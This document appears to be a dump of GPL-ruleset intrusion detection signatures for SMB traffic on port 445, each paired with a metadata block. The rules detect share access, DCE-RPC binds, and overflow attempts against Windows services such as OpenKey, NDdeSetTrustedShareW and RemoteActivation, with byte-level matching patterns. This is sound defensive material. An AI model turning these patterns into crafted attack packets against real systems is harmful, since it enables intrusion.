alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS D$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"D|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102469; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS D$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103385

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103385; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103386

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103386; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103387

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103387; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103388

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103388; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102465

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IPC$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"IPC|24 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2102465; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IPC$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102466

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IPC$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"I|00|P|00|C|00 24 00 00 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2102466; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IPC$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103401

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103401; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103402

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103402; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103403

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103403; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103404

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103404; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103264

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103264; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103265

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103265; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103266

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning unicode attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103266; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103267

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning unicode little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103267; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102948

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102948; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102939

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102939; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103024

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103024; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103227

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103227; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103226

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103226; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103229

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,2048,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103229; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103228

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,2048,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103228; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103417

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103417; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103418

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation little endian attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103418; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103419

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation unicode attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103419; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103420

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation unicode little endian attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103420; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

